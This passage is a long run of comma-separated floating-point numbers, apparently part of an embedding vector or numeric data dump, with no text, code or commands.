.0059130834,-0.013756136,-0.02180157,0.0038026103,-0.005347628,-0.013360143,0.019231332,-0.024258513,0.015851518,-0.0055380277,-0.013781334,0.012633982,-0.019933896,-0.00012388008,0.017369911,-0.011304106,-0.00881718,0.022009242,0.007897484,0.017465254,0.005176631,0.01805886,0.024034588,0.018330753,0.0051153773,0.026098523,0.0060784444,0.006412001,0.01499422,-0.0037442674,-0.02247777,-0.01097058,0.027435254,0.005177829,0.004159159,-0.017951667,0.01744064,-0.002252918,-0.029186176,-0.0027139,0.031632647,0.029693965,-0.010941322,0.010761353,0.009060591,-0.01901447,-0.00044316973,0.0059282775,-0.0065911496,0.011550052,-0.011323797,-0.018013814,0.0076812827,-0.009481817,-0.0073963264,-0.008788037,0.021295136,-0.00025274674,0.0014891842,0.03846358,-0.00053776405,-0.0001460254,0.028579071,-0.0058905007,0.0197783,-0.0013959818,-0.0062477165,-0.025717104,-0.035666414,0.0048360624,0.0038937037,-0.008220417,-0.028073829,-0.008378927,0.11039528,0.0013725219,-0.028513666,-0.00723505,-0.00024546252,0.005885016,-0.016320776,0.0059758513,-0.018393714,0.003056742,0.007853571,0.0035121064,-0.031460777,0.016924009,-0.01018991,0.028675973,0.008859119,0.007682822,-0.08270469,0.01078812,0.010868024,0.0011688111,0.011832536,0.012862635,-0.0048879543,0.020817079,-0.021607786,-0.001337036,-0.024631955,0.014067398,0.0123876035,0.017384823,-0.02580311,0.009869089,-0.009675857,-0.019834518,-0.00975242,0.007060918,-0.025647312,-0.002738716,0.016619604,0.008769143,0.0024931736,-0.015632404,-0.0018571883,0.023935968,0.020246692,-0.029263465,-0.00793014,0.01731933,-0.01039625,0.013761123,-0.008125745,-0.012370944,0.0005884802,-0.0035608923,0.020065805,-0.015579416,-0.0088720685,0.009735117,0.0068467525,0.008747419,0.010765244,0.008392543,0.020245483,-0.028262058,0.029406797,0.017032541,0.017904993,0.019314256,-0.041433465,-0.010868498,-0.014453334,-0.03735737,0.009445154,0.0051334924,-0.013389995,0.012117795,0.026907735,0.019793397,-0.013804049,0.018474704,0.006771602,-0.003054509,-0.007073803,-0.02775589,-0.024724016,-0.03230082,-0.010348637,0.01993036,0.008536657,0.00793821,-0.0021750117,-0.046546623,0.015094772,0.012405544,0.0061872257,0.01224317,0.0015285489,-0.0042018383,-0.003348625,0.00047808388,-0.014662481,0.008928424,-0.029246083,0.029979525,0.017969387,0.014933848,0.006902821,-0.015786711,0.027090637,0.008193402,0.0030403102,0.01307958,-0.014685874,0.011003156,0.017718395,-0.003362863,0.008619442,0.0006486678,-0.005322793,0.01418691,-0.003295663,0.028505102,-0.009171138,-0.00074085424,0.0013672934,-0.01703947,-0.013178576,0.014048026,0.002515498,0.028011972,-0.01005412,0.008286599,-0.008764494,-0.0015329202,0.021762528,-0.007194395,-0.0038048555,-0.018859582,0.023178475,0.002770655,0.010968473,0.005400617,0.021647306,-0.0063618002,-0.003710528,-0.0017811076,-0.01879894,-0.005688018,0.0071144938,0.013038452,0.009475393,0.012227068,0.018935334,-0.009074516,0.017048124,0.006503259,-0.0077086966,-0.021575157,-0.008671913,0.00894154,0.011441005,-0.0069251754,0.013748043,0.033722285,0.0017086131,0.039867472,0.010084719,-0.0015144915,0.004760271,-0.00069419213,-0.024956478,0.007903646,0.011407449,0.008202755,-0.010829472,-0.023124661,-0.015071149,-0.0016778824,0.024693122,0.0070093856,0.00007336026,-0.023925006,0.0020751124,-0.009048561,-0.0019743966,-0.0076855645,-0.01814508,-0.02739327,0.0030325209,0.013204959,-0.0071033454,0.016748209,-0.018859535,-0.011063125,-0.009509229,-0.019513639,0.009970476,-0.011087819,-0.02650521,-0.014077225,0.01749956,0.01344637,-0.019926094,0.0036295485,0.0011798583,-0.009843407,-0.0032127474,-0.028032148,0.021869233,-0.015294673,0.016622795,0.012530926,-0.008231377,0.014145638,-0.009693469,-0.019084351,0.048777442,-0.007874722,0.028202968,-0.00093026494,0.0031221614,0.025101667,-0.022014054,0.009673434,0.0070427763,0.040987197,0.011930588,-0.019450441,0.017857896,-0.00057025795,0.021697318,-0.0019498424,-0.011102733,-0.019850813,-0.0000053626713,-0.014800155,-0.00737484,0.022873731,0.0061255624,-0.0036673266,0.0045838878,-0.003920411,0.00669402,-0.008985284,0.015449711,-0.010527232,0.019087745,0.009574258,0.010501142,0.0032048638,0.015015826,0.0006435786,0.03532637,0.00640371,-0.015722875,0.016024418,0.019485863,0.016956145,-0.009947553,0.032796737,-0.024539534,0.024266213,-0.01530619,-0.014946706,0.025586478,-0.011566279,0.012073676,-0.0054389914,0.000025855823,-0.012256094,-0.011777403,0.008583586,-0.011916491,-0.0019220073,0.016604794,-0.0051771444,-0.0031737098,-0.0066424045,-0.0011291113,-0.0039543593,0.024113955,-0.015772758,-0.0090751005,-0.011042693,0.0068621975,0.039170418,0.003200804,0.008895062,-0.0024467565,-0.028706776,0.008423491,-0.018714173,-0.005297626,0.0034904645,0.02340307,0.00080634013,0.009299358,-0.02215258,-0.05461275,-0.032309204,0.014943806,-0.0019928527,0.0057479683,0.022033757,0.021655273,0.003143223,0.014014653,0.024060177,0.009721136,0.0032608155,0.00072235474,0.024624404,-0.0026694038,0.028888505,-0.023589546,-0.024153657,0.013129693,-0.00034486043,-0.01588479,0.013496405,0.016273702,0.02442917,-0.025532598,-0.012366173,-0.0063378317,0.04500059,-0.019448718,0.0018855048,-0.008324177,-0.01804135,0.018720843,0.00094827364,0.083980426,0.018347297,-0.0059310626,-0.006533123,-0.011989171,0.007730815,-0.021129623,0.004918585,-0.010884599,0.015451893,-0.009337631,-0.012278264,0.0010484284,0.034228068,-0.032622647,0.007355118,0.012986966,-0.0069720517,0.015051163,-0.0073835896,-0.011442305,0.0004029602,-0.03682415,-0.039562088,-0.026143165,0.005474014,-0.0004032438,0.029933516,-0.0042437813,-0.018099919,-0.00072039774,-0.009111431,-0.0027832342,-0.0113753555,0.02465386,0.003733903,-0.009753433,-0.008218923,0.008221038,0.03023038,-0.0098680705,-0.003307278,0.009656158,-0.004544096,0.0046624597,0.00575407,-0.0014614972,0.032694038,-0.0052671535,-0.0086089345,0.00012671005,0.027223231,-0.0038291349,0.0121856,-0.01654371,-0.010870472,0.015963642,0.008513037,-0.0022388508,-0.006064641,0.005742483,0.016638493,-0.033593062,-0.03982915,-0.01630408,0.018145734,-0.0025089723,-0.0077447756,-0.008911796,-0.030766297,0.0062097474,0.018936139,0.0029108005,0.0020768843,0.010343766,0.0106791,-0.011353538,0.005862988,0.0055035395,-0.016744154,0.010922827,0.00977316,0.0025701742,0.003680067,-0.014050338,-0.02026381,0.00076270854,0.017539313,0.0045900587,-0.022462675,0.0025478122,0.0047464003,0.025658092,0.024010066,-0.005747371,-0.0120307505,-0.012600917,-0.017221361,0.0066405227,0.021728648,-0.0023847746,-0.027621847,-0.040520396,0.024158016,-0.000716078,0.016328841,-0.0014065763,-0.0042811222,-0.007820786,-0.015951447,0.006485306,-0.048739996,0.0020915174,0.012390179,0.0076797446,-0.006142423,0.044922672,0.007493139,-0.0023076718,-0.00853775,-0.009354313,0.011886043,0.0031519176,0.0033700082,0.0014628225,0.0071388627,0.007705228,-0.02375098,-0.017864533,0.00076992856,-0.019875431,0.0020665457,-0.006975487,0.00030299916,-0.0048172707,-0.0011981943,0.018389324,-0.0024762498,-0.01896662,-0.027037894,-0.007437805,0.009733614,-0.0028354535,0.0031824657,0.024695855,-0.021222658,-0.0113290185,-0.0010045463,0.004841868,-0.0066121817,-0.009730553,0.0048632193,-0.018479794,-0.022815138,-0.009500768,0.008172622,0.015590245,0.015710639,0.020342518,-0.016351499,0.027794292,-0.00505045,-0.0066792667,0.012564606,0.017347641,-0.014511905,0.006175355,0.0026281346,0.02492157,-0.02688859,-0.0011947643,-0.009139094,0.009330319,0.005807852,0.01629262,0.0209504,0.014097246,0.008257952,0.0054150443,-0.0012523438,0.0038540442,0.0049947826,0.009734148,0.03772814,0.011817088,0.010263364,0.011456747,0.026642093,0.005313047,0.016462827,0.0012538831,-0.011880797,-0.03947741,-0.0019240895,0.00811322,-0.00457795,-0.017707426,-0.0003404527,-0.007917926,0.002571017,-0.010144249,-0.027928846,-0.006700988,0.003412013,-0.0027584939,-0.0049558133,-0.0034292361,-0.008286254,-0.03484196,-0.052419264,0.02836615,0.026641836,-0.003760693,-0.0093437135,-0.008103027,0.011445005,0.006844627,-0.023024721,-0.033392023,-0.0076522576,0.061156414,-0.0082826475,0.035822015,-0.0031921256,0.017177176,0.033394326,0.032233484,-0.017994817,0.009636857,-0.013691419,-0.016888654,0.018318001,0.038767237,-0.0056796395,0.0016106274,-0.005046868,-0.023344144,-0.00680131,-0.0008085779,0.008096717,0.029229233,0.004718779,-0.0023305817,0.010495479,-0.009916084,-0.021607015,-0.012269141,-0.018777136,-0.051314883,-0.0026650697,-0.0006122015,0.007168014,-0.036712866,0.02365258,0.004580879,0.04360018,0.020283401,-0.00569253,0.026129376,0.0038003155,0.013351775,0.02154835,-0.0037435384,-0.009544374,-0.015652813,0.0026528547,0.010840106,0.0030886098,-0.011798041,-0.028039714,-0.014257811,-0.012302534,-0.000053147676,0.0066271354,-0.024245698,0.010221999,0.0022159095,-0.0191061,0.031040639,0.0031426249,0.009235397,-0.0038388101,0.026452992,-0.0016752873,-0.009843419,0.001082821,-0.02157243,-0.034043558,0.011276762,-0.031312335,-0.014132913,0.032713998,0.012365551,-0.029671943,0.010386755,0.0025601068,0.009321174,-0.00837952,-0.0018156787,0.005916847,0.012804394,0.00041143937,0.019358784,0.011327595,-0.02658086,-0.01601811,0.0016543168,0.004529549,0.025881488,0.004968203,0.008865711,0.034006245,0.0047340305,-0.027719857,0.005970993,0.008261538,0.004071027,-0.0011021999,0.0030368038,-0.01990389,0.009684844,0.013386727,0.010156226,-0.00046190183,-0.0059255264,-0.00014772924,0.007715913,0.007938254,-0.027931375,-0.016201137,-0.0030203345,0.001949876,-0.006865348,-0.004839623,-0.011633453,0.007188852,-0.0050386465,0.0057838988,0.010647,0.008500495,0.015040042,-0.0026493978,0.009125047,-0.0054022935,0.015093107,0.014209594,-0.007479496,-0.013670006,-0.0006893637,-0.0011935832,0.010123051,0.008351778,-0.003893892,-0.015055367,0.0101950485,-0.008859086,0.0067594643,-0.006729487,0.010490072,-0.012009252,0.000002175556,0.015632235,0.006832982,0.0034351044,-0.013059962,0.008593978,0.014110181,-0.0048883576,-0.008438999,0.009643493,-0.027825335,0.037994105,0.01945768,-0.012083097,0.0048319297,0.0020786189,-0.013957115,0.005226441,-0.001839955,-0.0005174608,0.014450109,0.0029280747,0.029139744,-0.004994116,0.014922226,0.0047582253,-0.014385899,-0.012840676,-0.01563928,0.026911568,-0.0094311675,0.024477886,-0.00043207724,0.013077019,-0.041966446,-0.015459356,0.017200258,0.0055247727,0.01724262,0.024433732,0.0005501918,-0.00850534,0.014755263,0.019999495,-0.022445902,0.009914917,0.0007794742,-0.05163496,0.0076536485,0.0043328307,-0.0083570555,0.013135866,0.026375543,0.0041651195,-0.0027622473,0.014374872,-0.016043877,0.00901359,-0.013004353,-0.006775075,-0.01473285,-0.02560105,-0.020413024,-0.025737276,-0.0063246153,0.014046573,0.023136007,-0.038138494,0.005099085,0.0019755594,0.0010117372,-0.0005215237,0.010100906,-0.011045632,0.016111651,-0.01890552,0.006377676,0.015325449,0.0028884334,0.010137643,-0.0057339547,-0.014382243,-0.0072048455,-0.020760799,-0.01216748,-0.00055424887,0.01371856,-0.0028629343,-0.002132491,0.00075954275,0.043525647,0.0040827,0.004514717,-0.008152964,-0.017020693,0.0042315573,-0.016012365,0.022281744,-0.01475952,0.009644363,0.016754067,-0.017150477,0.030304711,0.0077200676,0.0023155597,-3.91469e-8,0.0074268403,-0.01512501,0.011279706,-0.006154357,0.02040313,-0.028519178,-0.021092627,0.013577148,0.00874522,0.0066067716,0.00363216,-0.0039764782,0.00023274291,0.032330263,0.010966386,0.005388058,0.021350529,-0.018251272,0.0028919585,-0.0027135718,0.0071884054,-0.0016833551,0.0035825558,-0.0310682,-0.0024997022,-0.036177386,0.0009599881,-0.01343882,0.011854242,0.00233707,-0.01747141,0.008446121,0.016374687,-0.016388757,0.016435767,-0.0033693428,0.0462942,0.011948613,0.027939282,0.008249414,-0.021453803,0.024177758,-0.005169329,-0.024942135,0.023498155,-0.025073508,0.0004992816,0.0201787,-0.0025844912,0.0074296384,-0.0003161417,-0.01055365,-0.011405196,-0.00056745514,-0.005945636,0.008715426,-0.000019055373,0.004176252,0.034110148,0.04226536,0.00071941526,-0.0050033093,-0.0005692451,-0.003151383,-0.0012691235,-0.025502697,-0.022799512,0.024516156,0.01308584,-0.02312534,-0.012455033,-0.008528843,0.025145045,-0.03148642,0.006417194,0.03098892,-0.01847522,-0.008836947,-0.019298296,-0.017248023,-0.005985843,-0.01878443,-0.018432906,-0.020790828,-0.018103452,-0.024923567,0.010879469,-0.0074914857,-0.02302532,-0.011625972,-0.01066451,-0.020480322,-0.012252518,0.010301919,-0.011704104,-0.0074725132,0.010009114,-0.01993219,-0.008668427,-0.0058594677,-0.022972524,-0.031876516,-0.0039706635,0.013796389,0.00780431,-0.019822462,0.008299483,-0.005526495,0.00773412,-0.022797983,-0.0017638969,0.011500342,0.021594783,0.018522544,0.0056912284,0.020942418,0.0070249825,0.017777609,0.015327959,-0.00020201415,-0.018608192,0.0013157122,0.022890233,0.008819012,0.012486342,0.02590417,-0.03164772,-0.010386592,-0.020213889,-0.031019924,-0.0058022006,-0.0060879174,0.0061132633,0.01928209,0.004765945,-0.009402458,0.007993377,0.01715092,-0.010419393,-0.015634943,0.01150251,-0.013091232,0.021315278,0.0046332297,0.0023443014,-0.016971916,-0.02436657,-0.0008960033,-0.03579694,-0.026780294,-0.02607444,-0.03935488,-0.0033920875,-0.04642437,0.0144455815,-0.014129185,0.011489861,-0.011333725,0.0297684,0.03888193,-0.019019816,0.025329012,0.0027141373,0.0033535447,-0.005442272,0.010633726,-0.014209461,0.0005289496,0.0021856392,-0.0042749695,-0.0040134294,0.052854355,-0.0049293563,0.026128845,0.005370293,-0.005771762,-0.019779505,0.0018543395,0.011521253,-0.0059815566,-0.03154636,0.008249125,0.025711996,-0.00084892916,0.020670826,0.023192717,0.047226254,0.028415352,-0.021777283,-0.006231193,0.030793313,0.003604691,-0.002483185,0.0016355285,0.014282227,-0.01550498,0.00011982001,-0.038629625,-0.021315262,-0.0003450567,-0.012436544,-0.0009815848,-0.039452836,0.0039815214,0.001857353,0.020760158,-0.016855897,0.019493096,0.002511834,0.035543792,-0.0236201,-0.014251605,0.023768699,0.0047257887,-0.021977395,-0.009101735,0.00028381104,-0.01590851,-0.0009024405,0.016369337,0.0036100047,0.016889602,-0.0036916926,0.0003035531,-0.014388138,-0.00075772684,0.02007507,0.007433914,-0.03645819,0.036457773,-0.0069731623,-0.006307575,-0.0058573247,0.00012416528,0.027374197,-0.0013146932,0.0047646263,0.006067078,-0.016021851,0.016327508,0.007627106,0.019651122,-0.014805464,0.024469825,-0.014445222,-0.006914362,-0.0035906578,0.020728372,-0.008426234,-0.00030749443,0.0149268,0.003306734,-0.019805225,-0.0141505245,-0.027750188,0.017631926,0.0164117,0.0050331084,0.009906686,-0.011289343,0.0117274355,0.0038028788,0.0014964015,0.019194718,-0.003436599,0.011480743,0.030907458,0.02437168,-0.008167352,-0.025748534,0.0057978593,-0.017579496,-0.016761564,0.011779773,0.019911993,-0.004005114,0.0056905565,0.004598267,-0.015309213,-0.0035364856,-0.0023659575,-0.00015594464,-0.026713487,0.061994188,-0.012004286,-0.016281765,-0.017027559,-0.015162204,0.030847719,0.020653374,-0.031684685,0.004393284,0.021229262,-0.004042187,0.012666909,-0.008501371,0.003885829,-0.0025225156,0.021980168,-0.0035225686,0.0123507995,0.022061752,-0.0075181536,-0.007834738,0.0004342063,-0.017474081,-0.0006055313,-0.02385447,-0.0022401153,0.0122830635,-0.014867639,-0.027387131,-0.0068501863,0.013104325,-0.010509187,-0.004738259,0.026168926,0.03576417,-0.02215584,-0.014046362,0.0041009313,-0.01218117,-0.025403885,0.00598186,-0.0032986721,0.020046989,-0.0062969737,0.009954755,-0.015828872,0.085814916,0.031893782,0.010799116,-0.02822091,0.017612865,0.02115627,0.0030151284,0.0060517425,0.009003082,-0.008718292,0.0052635395,0.02900105,0.0036716494,0.014406902,0.0084938165,-0.0055403146,-0.0029763915,-0.024790695,0.010369082,-0.019372446,-0.012824803,0.033742733,0.00436014,-0.0034307085,-0.0065630116,0.027810415,-0.00039202918,0.0040799887,0.0072891586,-0.028526854,-0.0027569528,-0.010902007,0.015400136,0.009601959,-0.0029874234,-0.06489145,0.03130801,0.1859793,0.005186331,0.0038268126,0.010577951,-0.0028299121,0.0026384906,-0.1107671,0.0027553875,-0.013757548,-0.0017704995,-0.0057833134,-0.021002468,0.0045622634,-0.008163527,0.01847018,0.030189063,0.022417918,-0.030004894,0.02268698,-0.012703405,0.014792634,-0.0013605998,0.012731548,-0.0031424754,-0.03504161,-0.0016835423,0.02078937,-0.019334553,-0.009407119,-0.0019999226,0.0073368284,0.0017472028,0.0048765866,-0.0053823064,-0.03769214,0.0045984406,0.028124742,0.011491474,-0.024139449,-0.021751821,0.003324387,0.0028008649,-0.029864263,-0.049035117,-0.10716886,0.010623479,-0.000647535,-0.019117165,0.011971741,0.02563126,0.0012099517,-0.007206986,-0.017929774,-0.056827653,0.0049036266,0.020046422,0.007958913,0.015111584,-0.017404592,-0.022600608,-0.022197189,0.004633577,-0.00033477307,-0.011091333,0.013169653,0.011714131,-0.042271346,-0.020305185,-0.019407034,-0.0009889823,-0.0036189952,-0.0051324307,-0.0115448255,0.00096138875,-0.009139739,0.012801839,-0.0069584297,0.02153454,-0.020272033,-0.03585803,-0.009683119,0.014672534,-0.004954882,0.011393559,0.0017962612,0.0018863077,0.0050272197,0.010506308,-0.0080459,0.026368694,-0.0044243787,-0.015615409,0.0074800053,0.0038149836,0.030025564,0.0026265325,-0.023971206,0.0028205812,-0.016959097,-0.0111462185,-0.00022006418,-0.024968056,-0.012923203,0.009132928,0.00422968,-0.027211726,-0.0059625,-0.024524027,0.02196735,-0.034705352,0.00011293502,-0.037633244,0.0037746883,-0.011729603,0.0055846595,0.014057552,0.010841019,-0.00078912004,0.0149302315,0.0054991134,-0.024136892,-0.025822878,0.020149019,0.014313691,0.03215848,-0.023772411,-0.007014294,-0.025807917,0.001321989,0.0036942349,-0.0036861007,0.015238574,-0.017236577,0.020850794,0.013866416,0.020382846,0.029877152,0.00921834,-0.006679459,0.0064723426,0.01815514,-0.004789708,-0.03224714,0.026327109,0.013304868,-0.01510671,-0.004815747,-0.004107553,-0.01638253,0.031076603,0.01873012,-0.02425461,-0.0329971,0.012953521,-0.0009425788,0.0051310076,0.014026829,0.016350994,-0.021700995,-0.016024498,0.01224759,-0.010541226,0.0031299968,0.0034156071,-0.021809932,0.00081249076,-0.025263226,-0.0023874545,0.043122318,-0.013458937,-0.03533289,0.003184015,-0.009960488,-0.002639303,0.007355391,-0.014213289,0.0054097255,0.009840469,-0.00798856,0.0073013394,-0.013111784,-0.031031257,-0.013122996,0.0042753387,-0.007551223,-0.015200561,-0.0055442685,-0.014871413,-0.0061394875,-0.0017201293,0.028070236,0.012772866,0.017212775,-0.021218354,0.0027632408,0.035097044,-0.004096009,-0.020650318,-0.004320007,0.09040554,-0.0038386767,-0.038272668,0.024998862,-0.0018303023,-0.0031467273,0.008279793,-0.015739812,-0.02681304,-0.022570718,-0.0066855405,-0.013810786,-0.015770026,0.018058077,-0.035738423,0.028355077,0.02096465,0.004654975,-0.021795603,0.005971231,0.022889834,-0.0017949194,-0.012488408,0.04206423,0.014990114,0.007941775,0.006350756,0.00891575,-0.008501945,-0.00040597387,-0.014507817,-0.0074613886,-0.03197527,-0.004826283,0.01583635,-0.050696705,-0.009990545,-0.009339861,0.0037419694,-0.0182281,-0.0081524635,-0.0007223291,0.021267314,-0.027237102,0.026469313,0.017049724,0.0025050293,0.008600881,-0.008902562,0.021191869,-0.00370965,0.024901072,0.025208322,-0.015038985,0.013544274,-0.030520242,0.026115796,-0.00972194,-0.029394707,-0.0014227248,0.017714372,-0.004833793,0.0036591133,0.00251867,-0.008239163,0.0016500226,-0.0028224813,-0.018917661,-0.004239513,0.031049311,-0.0053887726,-0.011947414,-0.011518114,0.03171359,-0.008717296,-0.01035157,-0.027913872,-0.014263492,-0.03964349,0.017452182,-0.009468789,0.0072242813,0.0010398007,0.018881278,0.0018975557,-0.059635654,0.004615196,-0.0016279422,0.00004986982,0.014852997,-0.0073132743,0.032806944,0.019291425,0.005603114,0.017767584,0.0054329843,0.010587111,-0.00018127175,-0.00055314205,-0.029979592,0.01198906,0.007368763,0.0013839215,-0.0030889139,-0.022630332,-0.025731698,-0.008018467,0.012459823,0.01205687,-0.018746253,0.021819782,0.004280755,0.018875899,0.00613343,-0.014247947,0.037125453,-0.008910435,-0.012621763,0.01742355,-0.0067307567,-0.017534994,-0.020589313,-0.0065968577,-0.015877275,0.05204028,0.005954175,-0.026283704,0.0121429255,-0.011659399,0.022996765,-0.0014027548,0.030095723,-0.015435792,0.0019436578,-0.012913535,0.024029722,0.014054436,0.015236044,0.003111433,-0.022261031,-0.01288257,-0.010378866,0.008590022,-0.020196319,-0.02072961,0.005254434,0.0048425565,0.010565748,-0.032233827,0.006783316,-0.011245818,-0.011799808,-0.015844302,0.013922776,0.0031223302,0.032013077,-0.016446885,-0.023691503,-0.0056037004,-0.0064048828,-0.0023079868,0.023998477,0.0057605132,0.015897835,-0.02763656,0.0076477244,0.036964606,-0.012433301,0.028912527,0.0004486579,-0.025074704,-0.03863455,0.026352039,0.0013963736,0.009112616,-0.009219034,0.023144467,-0.00029628183,-0.028452996,0.022763053,-0.003476107,0.011984978,-0.035840582,-0.012656636,0.014117071,-0.014714823,0.001730638,0.017565567,0.005985686,-0.0067573977,-0.004527983,-0.0064910282,-0.0186326,-0.01853246,0.014951846,0.018947273,0.014156905,-0.0007553039,0.017096784,0.016299848,0.006593066,0.016446456,-0.005699677,-0.019609326,0.019635819,-0.0007714853,-0.0058071627,0.026562804,-0.018923303,-0.004514719,-0.014594688,-0.0058962516,-0.0046548466,0.007430872,0.012295586,0.017954707,0.009965538,-0.0048805824,0.00806569,-0.008707472,0.0032199835,0.006504767,0.029781964,0.013566338,-0.01687314,-0.004549253,-0.014182448,0.049563594,-0.0173686,-0.004669379,0.032770127,0.017560733,0.015287396,-0.011597834,0.006896216,-0.019050105,0.0055723884,-0.01977909,-0.02442817,-0.009884184,0.005263508,-0.025885196,-0.0151889045,0.0059592547,0.012127364,-0.0076477923,0.0022221392,0.008203772,-0.019521324,0.014745775,-0.021109184,-0.009666455,-0.028291631,-0.002730619,0.0052491985,0.0010225624,0.0054200157,0.008875167,-0.019489842,-0.028642965,-0.017478254,-0.011533452,0.00086445076,-0.013620895,-0.021662233,0.004029709,0.025709674,0.0023060844,0.0022733698,-0.00441002,-0.027274463,0.011464885,0.004318326,0.030701147,0.008144296,-0.0051094713,0.01757735,-0.018089324,0.016621089,0.016317789,0.000695252,0.00076995563,0.010763106,-0.010621834,-0.030767202,0.017736187,0.018503862,0.007779671,-0.009150166,-0.013741722,-0.015723895,0.0036695902,0.0035763881,0.00055238337,-0.010086785,-0.021888323,0.00592106,-0.017921481,0.016953843,0.007636905,-0.005241686,0.008253097,-0.009803167,0.035410993,-0.002000625,0.004118589,0.0002561258,0.006259502,-0.006863191,-0.016334118,-0.021386988,0.016108323,0.012349765,-0.015886469,-0.025611933,-0.017729226,-0.012151995,0.01803221,-0.012062711,-0.039485853,-0.018492557,-0.015922815,-0.013527553,-0.0037661556,0.0069706943,0.0065516243,-0.0035108717,-0.0031979978,0.011015099,0.019971125,0.011101804,-0.02963708,-0.024123678,-0.07795456,-0.0015418633,-0.030760245,-0.0065786904,-0.016046485,-0.004504659,0.0047750254,0.08269052,0.0059751854,-0.027106442,0.0048233443,0.027645603,-0.017751426,0.017415285,-0.0038569348,0.017432127,0.0016007281,-0.001447686,-0.006566366,0.003665389,0.0036261657,0.019419657,-0.014445405,-0.025059722,-0.005739625,-0.010316244,-0.019682292,-0.0066456064,0.04131591,0.009301688,-0.011413176,0.03251041,0.0033382906,-0.024434065,0.00706983,0.015583711,-0.016068807,0.01536622,-0.00463551,-0.0009933184,-0.008304529,-0.028129335,-0.012570158,0.018877285,-0.010430685,0.006662514,0.010912846,-0.002074768,0.04687477,-0.029238626,-0.0131246485,-0.02901612,0.017044216,-0.02412938,0.015829949,0.015707223,-0.03492753,0.011365465,0.011114308,0.0046091685,0.0013831919,0.036200766,0.009090459,-0.021111878,-0.0027343663,-0.0025014835,0.004474584,0.00039258786,-0.0016078376,-0.019651014,-0.007069227,0.0000371019,-0.004506778,0.0061143828,-0.020872207,-0.004341573,0.026457168,0.006228235,-0.0012533646,0.034464043,-0.011004697,-0.0056033935,-0.0074687176,-0.005027498,0.029373504,0.007980023,0.0047751344,-0.0025949224,-0.016195672,-0.017750762,0.0021526671,-0.008858164,-0.024636798,-0.003454787,0.019895129,0.0025790087,-0.0018906225,0.021338366,0.00878841,-0.005723509,0.01049924,0.008249122,-0.013961944,-0.007620771,-0.107204504,-0.0057216724,0.0073648468,0.020472674,-0.0012081933,-0.00018701341,-0.00024206689,-0.0013589778,-0.01752913,-0.021582905,0.0067400374,0.009839981,0.026557563,0.0028739958,0.026367173,0.006153607,-0.020541435,0.028077971,-0.0047104973,0.0025062962,0.010753628,0.0020594758,-0.026042547,-0.005774337,0.01021451,-0.0068597356,0.016389862,0.0087433895,0.036201138,0.0054925433,0.0012154529,-0.00046954045,-0.011406013,0.00052380137,-0.005208816,-0.017666142,0.015368568,0.0312879,0.003127806,0.0041115107,0.007932018,-0.017659768,0.0012870406,-0.007711928,-0.017774206,0.021962585,0.02301589,0.019034537,-0.019876651,-0.001716199,-0.013476463,-0.015359624,0.007439918,0.0034866848,0.000016510909,0.005104248,-0.0054339212,-0.010275592,0.00015056688,0.007124263,0.010935504,0.0010370162,-0.01612979,-0.014080895,-0.0018889264,0.022736007,-0.01175939,-0.0012830192,0.0074756956,0.011359757,-0.022686968,0.00498844,0.034211013,0.019017162,0.010830568,0.014568589,0.00030755368,0.02192066,0.010497798,-0.036642108,-0.006663459,0.0020794151,-0.027385985,0.008371387,-0.013753256,0.0021756683,0.020139057,0.024172163,0.0017806019,0.03951398,-0.0035836732,0.020219432,0.008366315,-0.019997174,0.004606388,0.01155343,0.00489261,0.010487339,0.02387261,-0.00961534,-0.05049178,-0.008676904,0.004394843,0.002320648,-0.014640328,0.02397919,-0.022668859,0.00015101167,-0.0144661255,0.00642084,0.005616356,0.0024997941,-0.012926066,0.015404131,-0.005314725,-0.0003263585,0.00803842,-0.0011334487,-0.00413022,0.00892658,0.0033712185,0.02314225,0.0140063865,0.0031447036,-0.014116952,0.022588585,-0.01912921,0.03207448,0.009523718,-0.00599618,-0.0032113083,-0.005233283,0.009106277,-0.017941851,-0.0005071432,0.008853831,0.009247075,-0.0038872042,0.0281712,-0.0009765052,-0.0027895398,-0.021056976,0.01906556,0.027293805,0.007917681,0.009821908,0.012342177,-0.004414362,-0.011454638,0.006790347,-0.043249942,-0.03207746,0.018351385,-0.017105939,0.008132598,0.0028071555,-0.013189694,0.012108574,0.00437998,-0.010146553,0.01913752,0.014032954,0.024218619,0.0021931722,-0.0017472066,0.0064453115,0.01040189,0.0007468511,0.0024488852,0.008610121,-0.005210216,-0.007029195,-0.010163314,0.0034067975,0.003670469,0.0034221972,0.015153983,0.048900384,-0.00014014526,0.031103738,0.013882271,-0.00380354,-0.016070055,0.00031081281,0.0200157,-0.00020724953,-0.012748639,-0.0017049311,-0.007215345,-0.0032535181,0.0078097167,0.013282814,-0.008091597,-0.0019271185,0.005332035,0.042191036,-0.003710117,-0.012340433,0.022187406,-0.006218411,-0.002818593,0.024983333,0.0042646243,0.014803477,-0.0057854457,0.019984415,0.0015632537,0.013130495,0.037389137,-0.009856092,0.0024681736,-0.0026333432,0.0013384917,0.018797122,0.0023033572,0.012449248,-0.0094448,-0.027351407,0.014128263,-0.02639585,0.0321122,-0.014819221,0.017144823,-0.0023102644,0.01241718,0.017579101,0.0033841953,0.025592104,-0.017353682,-0.013098475,0.020550206,0.008718257,-0.0095381895,0.0031675263,-0.011880741,-0.000026368609,0.016884733,0.011661396,0.0023471953,-0.005144336,0.0049523367,0.03774755,0.018456602,0.004314202,0.019470671,-0.0108808605,0.016318351,0.00056299905,0.004872487,0.007379079,-0.019793814,0.002260954,-0.005892172,-0.021615328,-0.00077304716,-0.014179358,0.023964703,0.0014808194,-0.024593161,0.0051600053,-0.032516625,0.0077204094,0.0013125123,0.0038402216,-0.00051170704,-0.023453409,0.025220642,-0.038915895,-0.0044113123,0.007908746,-0.008660719,-0.0024122826,0.01230978,0.0062737917,-0.015212642,0.0048605856,-0.009816526,0.0066745663,-0.006684964,-0.0036588146,-0.013593494,-0.009076192,-0.0014786654,0.0089032,0.022479275,0.021848412,-0.016926,-0.00032324166,0.014992058,-0.0035924148,0.011107442,0.0017999604,0.0007440538,-0.020140605,-0.04170097,0.023350209,0.041666664,0.0018254776,-0.010247558,-0.0045686755,0.008643037,-0.008393219,0.0041437983,0.011663891,-0.003976695,0.0050090738,0.009317204,0.010933838,-0.0036861075,0.0017909935,0.007836517,-0.012496785,-0.02504008,0.014352499,0.025113907,-0.010966114,-0.011772581,-0.016455265,-0.015440328,0.003892999,0.0044910926,-0.02008275,0.027774543,0.0022818064,0.008113938,0.013912244,0.03578297,0.03414282,-0.03496257,0.0032982118,0.015528605,0.010629025,-0.010977631,0.008261628,0.005994202,0.0005105423,-0.0020034462,0.015867641,0.008293846,0.028743297,0.014031489,0.012382953,-0.010526813,-0.014204609,-0